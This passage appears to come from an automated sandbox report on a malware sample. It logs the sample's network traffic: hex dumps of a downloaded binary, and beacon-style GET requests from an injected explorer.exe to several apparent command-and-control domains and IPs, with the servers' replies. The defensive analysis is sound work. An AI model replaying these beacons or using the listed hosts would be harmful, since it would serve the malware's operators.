3b 7a b8 19 ca 18 d3 d6 fe 56 b6 fe 75 3a 50 30 4c 18 82 42 d3 ba b4 94 fe 7e f7 b8 54 5e ce 02 9a e0 39 0b 66 00 ad f9 bc 29 82 3f e2 ad ae 1f 8c bf ca eb 67 96 fd 59 23 fa ab 47 82 db 51 bb fa c0 1e 81 19 7a 46 fe 4a dd e3 60 25 cc 26 65 1e e7 22 c5 23 53 be 2e 74 10 c2 f6 8a 1f 71 12 56 d2 94 e1 43 09 90 ce 9f b2 93 70 99 23 bb 65 60 2c d4 44 ca 3c 90 2a eb f6 50 d6 61 d3 f7 0a 0c 0e fe 45 d4 03 0a 0e 1e 87 4a ef a1 7d 30 f2 e8 c8 6b 48 16 da 93 53 52 35 d0 59 50 1e 20 07 18 c2 23 27 24 4a 06 f4 30 02 bc ed 48 bc 27 d7 29 99 ea 52 03 f4 71 56 14 93 5c 40 56 b5 40 da 50 9d 00 00 90 14 d0 56 09 96 c4 9b f1 6e a4 26 9d 68 67 8c dd 20 ef be 01 73 20 d1 81 4f db 73 c3 8a 0d a1 87 50 8d ab d2 8a 5a 49 70 1d 27 a2 63 27 85 Data Ascii: xjv[:cWo2XaWwf~c(i#47q{HH=f`,Dx#`>]X>mJ}0kHSR5YP #'$J40W)'s=54)%0?ra47gNN +]PZMA<ZYArxb7]COrB#]Wuo~,Xmn@+zrN0)y7_>U31i&QD]=+\+eF;6VHoU&T[F1}78MD#tA?z.v%PS&W=mm<;]-ae1mwn2E4pF.$C"hy?59atUDVoa9S"56zi?!X_Glc!?fx-M.5`&eMYs3rMnD3k8"nQ"~~K"J@O?Vp^1C_:6Y.Q.#0gQzYI2fax^#AfF=u `l3 ]LrDE:fQhPw$WDqC$q.R8XF+T=DKay14~WTC^S9;zVu:P0LB~T^9f)?gY#GQzFJ`%&e"#S.tqVCp#e`,D<*PaEJ}0kHSR5YP #'$J0H')RqV\@V@PVn&hg s OsPZIp'c'
Mar 20, 2023 09:09:13.461865902 CET	110	IN	Data Raw: 77 c7 76 60 90 4c 78 75 5a 59 8c cb d1 70 04 6b 2f 2a 1f 8e b1 de 9a 4d 63 af 3d f6 00 88 14 20 10 4a 3e c2 05 e2 62 ee ca 75 92 9f d4 6f aa 7e 10 2c dc d6 b5 fc dc b5 ce 1d 92 0f 8e 6c 8d ea 3f 1a 8c c4 40 bd a0 88 2b 86 7a db 60 72 bf 09 e8 10 Data Ascii: wv`LxuZYpk/Mc= J>buo~,l?@+z`rD506_.U11)&QD]=)\eG;6VHoU&TyKF1}78]D#tA?z.v%PS&W=mm<;]-ae1mwn2E4pF.$C"h
Mar 20, 2023 09:09:13.461916924 CET	112	IN	Data Raw: 10 82 7f 3a db 36 a0 15 59 d2 2e 51 2e 23 f8 30 14 b8 8a 67 c0 8f 51 a5 7a 95 cb c6 96 59 83 49 32 db 1c 66 61 78 5e 23 cd b3 41 07 8c fb 66 c7 46 3d 75 93 20 84 60 f9 6c f1 33 ef 11 20 5d cf 4c 72 44 14 d2 e6 c9 9b 07 45 e4 3a 66 07 ea 51 68 cd Data Ascii: :6Y.Q.#0gQzYI2fax^#AfF=u `l3 ]LrDE:fQhPw$WDqC$q.R8XF+T=DKay14~WTC^S9;zVu:P0LB~T^9f)?gY#GQzFJ`%&e"#S
Mar 20, 2023 09:09:13.461976051 CET	113	IN	Data Raw: 9f d4 6f aa 7e 10 2c dc d6 b5 fc dc b5 ce 1d 92 0f 8e 6c 8d ea 3f 1a 8c c4 40 bd a0 88 2b 86 7a db 60 72 bf 09 e8 10 44 12 99 35 d8 96 96 b9 e1 05 30 7f cd bb f9 88 36 83 5f 2e 0c 88 55 19 31 9f 16 31 29 26 51 96 44 5d 3d 29 91 98 d4 5c 2a 65 82 Data Ascii: o~,l?@+z`rD506_.U11)&QD]=)\eG;6VHoU&TyKF1}78]D#tA?z.v%PS&W=mm<;]-ae1mwn2E4pF.$C"hy?59atUDVoa9
Mar 20, 2023 09:09:13.461987972 CET	114	IN	Data Raw: 10 07 ae 92 4e 01 39 fc dc 28 07 a4 fd e5 a6 3f b1 4a ab b8 92 8f 05 56 2b 7f 54 9c 10 eb ce a1 2e ed 4a fa d2 84 e9 97 88 93 f4 07 71 8e 68 35 fb a0 3f 0a 57 44 57 70 43 ca 51 13 fa b7 2a 38 bf a2 6e ff b9 b3 0a 9b 87 00 d3 7c 5e 00 59 db ac 40 Data Ascii: N9(?JV+T.Jqh5?WDWpCQ*8n\|^Y@Ky1h2.[qZBL],Wtj?TIJ;xVurS+1(3E7EU\|{0TTl)h LC^G,+z>uIF-\iFH5bV1-<q],z_
Mar 20, 2023 09:09:13.461999893 CET	116	IN	Data Raw: 1f 13 e6 42 1e fa f2 c8 7a ce 3e 0d 42 78 a0 d1 10 75 a8 f8 f6 1a 6e ca d6 d9 ff 05 d7 60 fa ac ed 63 2b a3 40 43 a4 97 57 03 40 13 b8 c4 d2 00 c1 13 91 76 59 b3 90 e4 a8 fc ac a9 92 a3 8b af 2a 86 d6 68 bc 75 81 9c bd 86 c8 6c ea 39 f4 de 60 16 Data Ascii: Bz>Bxun`c+@CW@vY*hul9`0RCt7I'.gP{!5!3pab}rpTl/wc&=iqUlqs>x3Ltb?k.Zu'OBLRs_UeH)
Mar 20, 2023 09:09:13.462011099 CET	117	IN	Data Raw: 6b 1a 97 36 32 71 50 25 f5 a8 12 33 c9 15 84 a1 87 8c 3a d1 ff f0 68 91 4a 34 44 a5 68 b9 f6 dd ff 3f 33 55 0e a9 3a c2 9f 02 28 eb c8 b4 b0 46 e6 1b 0d 78 51 f4 d0 69 43 77 ab bc 32 77 d8 52 60 9f 7c 02 5a 38 dd 67 26 00 de 4f 88 2e 29 01 0b 74 Data Ascii: k62qP%3:hJ4Dh?3U:(FxQiCw2wR`\|Z8g&O.)t<},iS{Gb'R_KFgSs[z^QxTN`\|h~Mf3gC"%_-knfzRQ7osxt5mUkj
Mar 20, 2023 09:09:13.462033033 CET	118	IN	Data Raw: 9c b0 c4 77 4e 8e f1 a2 34 58 30 98 e4 16 a8 ad 8f cc e1 86 28 22 86 2b 42 3a 39 61 de b4 fd c0 6c 5a 43 77 bc 19 54 25 c0 01 52 e0 e6 03 76 d3 b3 c4 b7 8d f2 19 48 da 05 c5 97 2a 3e 2f 2e ac 45 31 e8 ea 39 38 6c a0 f8 c2 75 9a b2 5f cd 8a af aa Data Ascii: wN4X0("+B:9alZCwT%RvH>/.E198lu_2]a<Ao}wf[Y5Bk?yxhWix(DJYSbQ7:)0R]>W=$'KHuy+sDbT UC46Cit
Mar 20, 2023 09:09:13.462156057 CET	120	IN	Data Raw: 41 d6 f6 b1 c3 e0 1b f8 80 f5 32 9b 2b 4e f6 ad bc a1 65 f7 ce 3f dd 75 7f 5c 38 c6 f4 fb 4d bf 0d 9d 57 2f 01 a9 9e 20 0f 9f 97 b5 c4 e1 7d bd f5 34 03 4e 39 fb 7b 41 ab a1 6a bd 37 df fe 8e f6 f9 52 06 58 b4 b8 13 25 28 3a e6 73 40 c7 79 1f c6 Data Ascii: A2+Ne?u\8MW/ }4N9{Aj7RX%(:s@y:T=Ex$4$53*NR+kX7?fNzoUvIVCj~P/M% Aw#[PR`mJ;akF@/V6pbN(
Mar 20, 2023 09:09:13.462157011 CET	121	IN	Data Raw: ef 45 48 8d e4 31 d1 a9 d6 79 c4 e9 33 b1 eb fd 9a 37 1f 94 cb 13 f2 11 7f 39 f8 60 4b 72 e2 03 17 28 9c 4d fe 21 2c 2d 68 c5 9f df 31 7c a2 74 c5 65 a5 15 60 0e 77 e9 9e 68 46 5d e9 61 f3 ee 5b 1c b3 dd 2d 4c 4e 54 00 1f 2f b7 bb 7c 47 f5 d4 fe Data Ascii: EH1y379`Kr(M!,-h1\|te`whF]a[-LNT/\|GQcIGki+W{/RZ$dbd?56Y{Z`W_)uU7p]XN\|DF75goz\|~+U\v8mgVNS2.y/7d]5h
Mar 20, 2023 09:09:13.480679989 CET	123	IN	Data Raw: 30 4c 18 b1 1e 6b be 3f e9 02 4d ae a0 95 a1 c6 8b c7 14 b2 56 96 c1 56 e9 3d ce 7d 3f e2 ad 25 63 34 bb 4b 08 98 96 fd 59 a8 a6 33 43 43 14 41 7a 31 c8 2d 7a 92 27 aa 7f a9 22 e3 60 25 47 7a fd 1a 26 e1 cd 10 a8 35 73 8c d1 39 ee 0b fc 8e 12 56 Data Ascii: 0Lk?MVV=}?%c4KY3CCAz1-z'"`%Gz&5s9V^C$"r(aEsF 4RB#'7z/zR^Q\/Vij/{i[^M&0f])@$uKYc'+_r[DK(.p

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49816	192.187.111.221	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:09:55.302942991 CET	341	OUT	GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=qQKx9PCKTcR0X3fJLav3D/FI6bogqcX+QhlqDFXKzmg3lH7RMn/qXLrYouNPLK8mW2// HTTP/1.1 Host: www.paparazirestaurant.co.uk Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:09:55.433347940 CET	342	IN	HTTP/1.1 200 OK accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile cache-control: max-age=0, private, must-revalidate connection: close content-length: 595 content-type: text/html; charset=utf-8 date: Mon, 20 Mar 2023 08:09:54 GMT server: nginx set-cookie: sid=993fb70e-c6f6-11ed-bc93-71c723115f09; path=/; domain=.paparazirestaurant.co.uk; expires=Sat, 07 Apr 2091 11:24:02 GMT; max-age=2147483647; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 70 61 70 61 72 61 7a 69 72 65 73 74 61 75 72 61 6e 74 2e 63 6f 2e 75 6b 2f 6d 73 31 32 2f 3f 61 36 41 38 3d 70 30 47 68 67 56 6d 30 4d 48 44 64 70 38 6d 26 63 68 3d 31 26 68 54 3d 71 51 4b 78 39 50 43 4b 54 63 52 30 58 33 66 4a 4c 61 76 33 44 25 32 46 46 49 36 62 6f 67 71 63 58 2b 51 68 6c 71 44 46 58 4b 7a 6d 67 33 6c 48 37 52 4d 6e 25 32 46 71 58 4c 72 59 6f 75 4e 50 4c 4b 38 6d 57 32 25 32 46 25 32 46 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 33 4f 54 4d 77 4e 6a 6b 35 4e 53 77 69 61 57 46 30 49 6a 6f 78 4e 6a 63 35 4d 6a 6b 35 4e 7a 6b 31 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 44 63 78 4e 47 67 78 64 57 6b 78 61 57 68 74 4e 32 39 6e 61 57 38 34 62 57 6b 31 63 7a 45 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4e 7a 6b 79 4f 54 6b 33 4f 54 55 73 49 6e 52 7a 49 6a 6f 78 4e 6a 63 35 4d 6a 6b 35 4e 7a 6b 31 4d 7a 63 79 4e 44 63 78 66 51 2e 68 4a 67 31 30 4a 4c 66 69 4c 39 46 54 6e 43 7a 4c 65 7a 30 43 61 79 4b 45 54 67 37 7a 57 44 77 4e 63 4f 50 37 64 77 32 56 44 41 26 73 69 64 3d 39 39 33 66 62 37 30 65 2d 63 36 66 36 2d 31 31 65 64 2d 62 63 39 33 2d 37 31 63 37 32 33 31 31 35 66 30 39 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.paparazirestaurant.co.uk/ms12/?a6A8=p0GhgVm0MHDdp8m&ch=1&hT=qQKx9PCKTcR0X3fJLav3D%2FFI6bogqcX+QhlqDFXKzmg3lH7RMn%2FqXLrYouNPLK8mW2%2F%2F&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTY3OTMwNjk5NSwiaWF0IjoxNjc5Mjk5Nzk1LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydDcxNGgxdWkxaWhtN29naW84bWk1czEiLCJuYmYiOjE2NzkyOTk3OTUsInRzIjoxNjc5Mjk5Nzk1MzcyNDcxfQ.hJg10JLfiL9FTnCzLez0CayKETg7zWDwNcOP7dw2VDA&sid=993fb70e-c6f6-11ed-bc93-71c723115f09');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.11.20	49840	13.248.157.32	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:14:39.545243025 CET	480	OUT	GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=KsItnxjux7GTZO7TUTKtm8QLzBBO9NcCFMwewp8NtohxkT6a6dLohlItrjGlglAawoap HTTP/1.1 Host: www.amyjohnsonrealtor.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:14:39.726479053 CET	480	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Mon, 20 Mar 2023 08:14:39 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.amyjohnsonrealtor.com/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=KsItnxjux7GTZO7TUTKtm8QLzBBO9NcCFMwewp8NtohxkT6a6dLohlItrjGlglAawoap Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.11.20	49842	104.21.39.114	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:15:00.044343948 CET	488	OUT	GET /ms12/?hT=XQDAKTxCfPAtZ1kZf5EiiDFWaFS1BQmSMuwLBzPPFACL8OgktJOl440I6bHrpdhUiEnu&a6A8=p0GhgVm0MHDdp8m HTTP/1.1 Host: www.lists-cellphones.life Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:15:00.065488100 CET	489	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 20 Mar 2023 08:15:00 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Mon, 20 Mar 2023 09:15:00 GMT Location: https://www.lists-cellphones.life/ms12/?hT=XQDAKTxCfPAtZ1kZf5EiiDFWaFS1BQmSMuwLBzPPFACL8OgktJOl440I6bHrpdhUiEnu&a6A8=p0GhgVm0MHDdp8m Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uPe6APKG%2F1w7nIQ2XJzgfzIhMMWK%2F%2BvFDLSXwr8n5zlyS7VPQ%2FPZEbGDeK%2F5iBGQLRpUd1h7FbTDa%2FgccdEIat9UZUvf%2BYJZ7%2FV%2FJjoAaF9klt7GXzvBYj%2Benx8ymBTtlpsRj0a0%2Fu8K5Ex9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7aac81395a863720-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.11.20	49844	169.60.232.139	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:15:33.016840935 CET	496	OUT	GET /ms12/?hT=G6LllRn2UhCgoj9/NoDttLpXGK4pGwfwFGBz2EgLi6yWMZIZhDysno0vSCCcnKmdw4QQ&UlWl0=MBZlMJlh34CHQ HTTP/1.1 Host: www.findyellowfreightjobs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:15:33.147830009 CET	497	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 20 Mar 2023 08:15:33 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://findyellowfreightjobs.com/ms12/?hT=G6LllRn2UhCgoj9/NoDttLpXGK4pGwfwFGBz2EgLi6yWMZIZhDysno0vSCCcnKmdw4QQ&UlWl0=MBZlMJlh34CHQ?hT=G6LllRn2UhCgoj9/NoDttLpXGK4pGwfwFGBz2EgLi6yWMZIZhDysno0vSCCcnKmdw4QQ&UlWl0=MBZlMJlh34CHQ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.11.20	49845	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:15:35.185719013 CET	498	OUT	GET /ms12/?hT=YOOWDLIFFjmzpH1SAG7YZM+LVKYOCEYmA0eV1woM6pvlajKzKUVwFam52RyaFl1jbOMY&UlWl0=MBZlMJlh34CHQ HTTP/1.1 Host: www.conscienciaretroprogresiva.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:15:35.358359098 CET	498	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 20 Mar 2023 08:15:35 GMT Content-Type: text/html Content-Length: 291 ETag: "64063330-123" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.11.20	49846	183.181.96.18	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:15:56.256052971 CET	500	OUT	GET /ms12/?hT=lfzlfRYQFuadehd27GXthwlbqohm3e93HBX/EbDE1KV1AljB6VPD+GnlvvGiXqJ/lo6n&UlWl0=MBZlMJlh34CHQ HTTP/1.1 Host: www.triknblog.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:15:56.532022953 CET	507	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Mon, 20 Mar 2023 08:15:56 GMT Content-Type: text/html Content-Length: 2843 Connection: close Vary: Accept-Encoding Last-Modified: Tue, 20 Apr 2021 00:29:25 GMT ETag: "b1b-5c05c89d55ec5" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 37 70 78 3b 0a 7d 0a 70 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 2e 65 78 70 6c Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>403 Forbidden</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px; margin: 0; padding: 0; color: white;}.expl
Mar 20, 2023 09:15:56.532058954 CET	509	IN	Data Raw: 61 69 6e 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 0a 20 20 20 20 6c 69 6e 65 2d Data Ascii: ain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li { color: #666;}h3 { letter-spacing: 1px; font-w
Mar 20, 2023 09:15:56.532084942 CET	509	IN	Data Raw: c9 bd bc a8 a4 c7 a4 ad a4 de a4 bb a4 f3 a4 c7 a4 b7 a4 bf a1 a3 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 65 78 70 6c 61 69 6e 22 3e a4 b3 a4 ce a5 a8 a5 e9 a1 bc a4 cf a1 a2 c9 bd bc a8 a4 b9 a4 eb a5 da a1 bc a5 b8 a4 d8 a4 Data Ascii: </h2> <p class="explain"></p> <h3></h3> <div id="white_box"> <div id="cause"> <ul>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.11.20	49849	217.26.48.101	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
